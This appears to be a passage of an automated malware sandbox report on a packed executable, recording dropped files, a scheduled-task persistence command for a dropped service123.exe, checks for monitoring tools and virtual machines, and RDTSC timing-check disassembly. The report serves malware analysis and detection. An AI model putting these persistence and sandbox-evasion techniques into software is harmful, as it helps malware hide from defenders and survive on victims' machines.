Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4387840 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of pxpvtkpl is bigger than: 0x100000 < 0x1b4200

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.170000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pxpvtkpl:EW;hyrleous:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pxpvtkpl:EW;hyrleous:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 12_2_00DA8230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x4341be should be: 0x431e04
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: pxpvtkpl
Source: file.exe Static PE information: section name: hyrleous
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DAA521 push es; iretd 12_2_00DAA694
Source: file.exe Static PE information: section name: pxpvtkpl entropy: 7.95537610270117
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 884BF8 second address: 884C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A04547 second address: A0456B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F45B11B2366h 0x00000008 jmp 00007F45B11B2372h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F45B11B2366h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0456B second address: A04585 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B187B8E0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06D7E second address: 884BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 19AA8764h 0x00000010 jnp 00007F45B11B236Dh 0x00000016 pushad 0x00000017 xor cl, FFFFFF86h 0x0000001a mov dh, ch 0x0000001c popad 0x0000001d jnc 00007F45B11B236Ch 0x00000023 push dword ptr [ebp+122D10ADh] 0x00000029 mov dword ptr [ebp+122D2E6Fh], ebx 0x0000002f call dword ptr [ebp+122D1BDCh] 0x00000035 pushad 0x00000036 cld 0x00000037 pushad 0x00000038 and ebx, 4516903Dh 0x0000003e add dword ptr [ebp+122D1841h], ecx 0x00000044 popad 0x00000045 xor eax, eax 0x00000047 jmp 00007F45B11B2377h 0x0000004c stc 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 cmc 0x00000052 mov dword ptr [ebp+122D2C4Bh], eax 0x00000058 jmp 00007F45B11B2370h 0x0000005d stc 0x0000005e mov esi, 0000003Ch 0x00000063 mov dword ptr [ebp+122D17F2h], ecx 0x00000069 mov dword ptr [ebp+122D17F2h], edx 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jl 00007F45B11B237Eh 0x00000079 jmp 00007F45B11B2378h 0x0000007e lodsw 0x00000080 mov dword ptr [ebp+122D17F2h], eax 0x00000086 cld 0x00000087 add eax, dword ptr [esp+24h] 0x0000008b or dword ptr [ebp+122D17F2h], ecx 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 sub dword ptr [ebp+122D17F2h], edx 0x0000009b push eax 0x0000009c pushad 0x0000009d jo 00007F45B11B236Ch 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06E8D second address: A06EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4FBD1707h 0x00000010 or edi, dword ptr [ebp+122D2B23h] 0x00000016 jng 00007F45B187B8DAh 0x0000001c mov si, D680h 0x00000020 lea ebx, dword ptr [ebp+12455C93h] 0x00000026 mov dword ptr [ebp+122D183Dh], edi 0x0000002c push eax 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06EC8 second address: A06ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06F1A second address: A06F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06F1F second address: A06F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F45B11B2366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06F29 second address: A06F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F45B187B8E3h 0x00000011 nop 0x00000012 clc 0x00000013 push 00000000h 0x00000015 jnc 00007F45B187B8DBh 0x0000001b push 8B1D768Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06F6F second address: A06F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A06F73 second address: A06F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07103 second address: A0713A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F45B11B2366h 0x00000009 jnc 00007F45B11B2366h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F45B11B2379h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0713A second address: A07140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07280 second address: A07297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B11B2372h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07297 second address: A072AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A2EC second address: A1A2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A2F0 second address: A1A2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A2F4 second address: A1A2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FABD3 second address: 9FABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F45B187B8D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FABE5 second address: 9FABF7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jp 00007F45B11B2366h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25B7A second address: A25B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25B7E second address: A25B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25B89 second address: A25B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25E56 second address: A25E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F45B11B2366h 0x0000000c jnc 00007F45B11B2366h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A25E69 second address: A25E85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B187B8E2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2616D second address: A26189 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45B11B2366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F45B11B2372h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2633D second address: A2634D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A264A5 second address: A264F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2374h 0x00000007 js 00007F45B11B2366h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jg 00007F45B11B2366h 0x00000016 pop esi 0x00000017 jne 00007F45B11B2386h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A264F8 second address: A264FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A264FC second address: A26500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26500 second address: A26508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26508 second address: A26525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B2377h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26525 second address: A26529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26529 second address: A2652F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26AA1 second address: A26AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A26AA5 second address: A26AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F45B11B2366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F45B11B2371h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27587 second address: A275A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B187B8E8h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27720 second address: A27725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27725 second address: A2772B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27AF8 second address: A27B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F45B11B2366h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45B11B2370h 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007F45B11B2366h 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27B27 second address: A27B2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27B2F second address: A27B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B11B236Ch 0x00000009 jbe 00007F45B11B2366h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2AFA1 second address: A2AFAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45B187B8D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2AFAB second address: A2AFBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F45B11B2370h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2AFBD second address: A2AFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jng 00007F45B187B8F3h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F45B187B8E9h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2AFF1 second address: A2B01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45B11B2366h 0x0000000a popad 0x0000000b jne 00007F45B11B236Ch 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F45B11B236Ah 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F264A second address: 9F2650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32133 second address: A3213B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3213B second address: A3213F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
